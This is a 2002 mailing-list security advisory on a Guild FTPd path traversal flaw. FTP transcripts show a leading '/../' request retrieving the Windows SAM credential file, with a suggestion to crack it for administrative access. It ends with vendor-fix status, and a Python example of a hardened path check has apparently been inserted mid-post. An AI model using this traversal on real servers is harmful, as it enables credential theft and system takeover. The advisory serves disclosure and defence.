Full Disclosure mailing list archives

Guild FTPd Exploit


From: full-disclosure () mike-c com (Mike C)
Date: Mon, 9 Sep 2002 02:54:21 +0100

______________________________________________________________________
Product Information

Guild FTPd 0.999.5
Released 4th July 2002
http://www.nitrolic.com

Guild FTPd is an ftp server which is growing ever more popular due to
its link with IRC. It can detect if the people on your FTP are in
the same channels you are, and kick/ban them accordingly.  This is
useful if you wish to keep your ftp data a little more private.
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
____________________________________________________________
Exploit Information

Author: Mike C
Date:   7th September 2002

Description:
Using a simple exploit in Guild FTPd, we can download any
file on the same hard drive as the ftp root folder.
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
__________________________________________________
SAM SECURITY FILE
LOCAL PATH      =  C:\windows\repair\sam
FTP ROOT        =  C:\ftp
RELATIVE PATH   =  ../windows/repair/sam
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

1) We try to download the sam file using a relative path to the ftp root


ftp> GET "../windows/repair/sam" c:\sam
200 PORT command successful.
150 Opening ascii mode data connection for /../windows/repair/sam (24576
bytes).
425 Download failed.
ftp>


2) We get a 'Download failed' message, along with a filesize,
   confirming the file exists.  If the file doesn't exist, we get
   'Access denied: File not found.'


3) Adding a / to the start of the relative path seems to bypass the
   server's security relating to relative paths.  Note however,
   that / doesn't escape the ftp root as you may expect.
   Where '../foo.bar' is not accessible, '/../foo.bar' is.


ftp> GET "/../windows/repair/sam" c:\sam
200 PORT command successful.
150 Opening ascii mode data connection for /../windows/repair/sam (24576
bytes).
226 Transfer complete. 24576 bytes in 1 sec. (24.58 Kb/s).
ftp: 24576 bytes received in 2.08Seconds 11.80Kbytes/sec.
ftp>


4) We have just successfully exploited the server, managing to
   download the system's sam file.  An application such as l0phtcrack
   (http://www.atstake.com/research/lc/) could now be used to find
   the passwords, thus giving full administrative access to the
   exploited system.
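The transcripts above show the root cause: a check that refuses paths beginning with '..' but never normalises the path, so a leading '/' slips the same traversal past it. The following is an added example (not Guild FTPd's code, whose source is not public) contrasting a constructed model of that flawed check with the containment check a server should do: join the client's path to the FTP root, normalise '.' and '..' segments, then verify the result is still under the root. FTP_ROOT is a constructed stand-in for C:\ftp, using forward slashes for portability.

```python
import posixpath
from typing import Optional

FTP_ROOT = "/ftp"  # constructed stand-in for the advisory's C:\ftp


def naive_allowed(requested: str) -> bool:
    """Constructed model of the flawed behaviour in the transcripts: the
    request is rejected only if it starts with '..', so '/../x' passes.
    This is an illustration, not Guild FTPd's actual code."""
    return not requested.startswith("..")


def resolve_in_root(requested: str, root: str = FTP_ROOT) -> Optional[str]:
    """Hardened check. Returns the resolved filesystem path if the request
    stays inside `root`, otherwise None."""
    # Windows accepts backslashes as separators, so normalise them first.
    client_path = requested.replace("\\", "/")
    # A client's leading '/' means "the FTP root", never the filesystem root.
    joined = posixpath.join(root, client_path.lstrip("/"))
    # normpath collapses '.' and '..' segments ('/ftp/../w' -> '/w').
    resolved = posixpath.normpath(joined)
    # Compare against 'root/' so '/ftpx/...' is not mistaken for '/ftp/...'.
    if resolved != root and not resolved.startswith(root + "/"):
        return None
    return resolved


def demo() -> dict:
    """Run both checks over the two requests from the advisory plus a
    legitimate one (constructed input): (naive verdict, hardened result)."""
    requests = ["../windows/repair/sam", "/../windows/repair/sam",
                "pub/readme.txt"]
    return {r: (naive_allowed(r), resolve_in_root(r)) for r in requests}


if __name__ == "__main__":
    for req, (naive, safe) in demo().items():
        print(f"{req!r:30} naive_allowed={naive!s:5} resolved={safe}")
```

The naive check passes '/../windows/repair/sam' while the hardened check rejects both traversal forms and only ever hands the filesystem a path under the root.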

______________________________________________________________________
Vendor Status:

The authors of Guild FTPd were notified on 7th September 2002.
The exploit has been fixed as of 8th September 2002.
A new version will be released on 15th September 2002.
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
